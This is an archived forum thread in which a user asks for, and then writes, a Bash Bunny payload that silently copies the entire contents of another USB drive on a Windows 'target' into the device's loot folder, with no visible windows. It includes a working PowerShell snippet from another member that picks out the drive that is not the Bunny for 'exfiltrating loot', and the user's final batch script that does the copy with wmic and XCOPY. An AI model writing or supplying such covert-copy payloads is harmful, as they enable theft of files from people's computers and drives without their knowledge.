Natha_n Posted March 15, 2022 Posted March 15, 2022 Hi, I got into the Bash Bunny adventure recently. I would like to know if one of you can write me a program that copies the entirety of a USB key connected to the computer. Let me explain: 1) find under which letter the drive is connected (there will only be one) 2) copy all the files from the drive to the /loot folder I specify that I do not have access to the powershell but only at cmd. I also can't use hotkeys like Win+R. If possible, this should take place without the windows being visible. I ask you this in order to have an example that I can learn from. Thank you in advance to those who will take the time to answer me/write this program.
dark_pyrro Posted March 15, 2022 Posted March 15, 2022 Is it the same general constraints regarding this as you have already written in the USB Rubber Ducky section of the forums?
Natha_n Posted March 15, 2022 Author Posted March 15, 2022 Yes. But I really wish one of you would write this program for me so that I could understand it and learn more. (I'm new to Bash Bunny /rubber ducky)
Natha_n Posted March 18, 2022 Author Posted March 18, 2022 Okay. I've made some progress with the script but I can't select my USB key. Is it possible to identify the bash bunny and then select the other connected device (USB key). Is this command the right one? wmic logicaldisk where "drivetype=2" get name Can you tell me under which name the bash bunny appears (I haven't received it yet) and how to choose the opposite device? Thanks in advance for your answers
dark_pyrro Posted March 18, 2022 Posted March 18, 2022 Try something like this ### # There can be additional checking added, such as: # - if there are more than 2 USB storage devices # - if there's no Bunny found # (etc) # Get the drive letter of the Bunny and make sure it's in a format that can be used later on $bunny=((gwmi win32_volume -f 'label=''BashBunny''').Name) $bunny=$bunny.TrimEnd("\") # Get all the attached USB storage devices $usbdrives=@(gwmi win32_diskdrive | ?{$_.interfacetype -eq "USB"} | %{gwmi -Query "ASSOCIATORS OF {Win32_DiskDrive.DeviceID=`"$($_.DeviceID.replace('\','\\'))`"} WHERE AssocClass = Win32_DiskDriveToDiskPartition"} | %{gwmi -Query "ASSOCIATORS OF {Win32_DiskPartition.DeviceID=`"$($_.DeviceID)`"} WHERE AssocClass = Win32_LogicalDiskToPartition"} | %{$_.deviceid}) # Check which one is NOT the Bunny # Use that drive letter when exfiltrating loot foreach ( $usbdrive in $usbdrives ) { if ( $usbdrive -ne $bunny ) { $not_bunny = $usbdrive # Use the content of the $not_bunny variable to copy files from } }
Natha_n Posted March 25, 2022 Author Posted March 25, 2022 Finally, I made a batch script : @echo off MKDIR %~dp0\copy_folder FOR /F "tokens=2 delims==" %%u IN ('wmic volume where "drivetype=2 and label<>'BashBunny'" get driveletter /format:list') DO ( SET usb_key=%%u XCOPY /C /Q /G /Y /E "%usb_key%" "%~d0\copy_folder\" ) I would know how execute this batch file in the BashBunny payload. I can't use powershell because it's not available on my target.
Recommended Posts
Archived
This topic is now archived and is closed to further replies.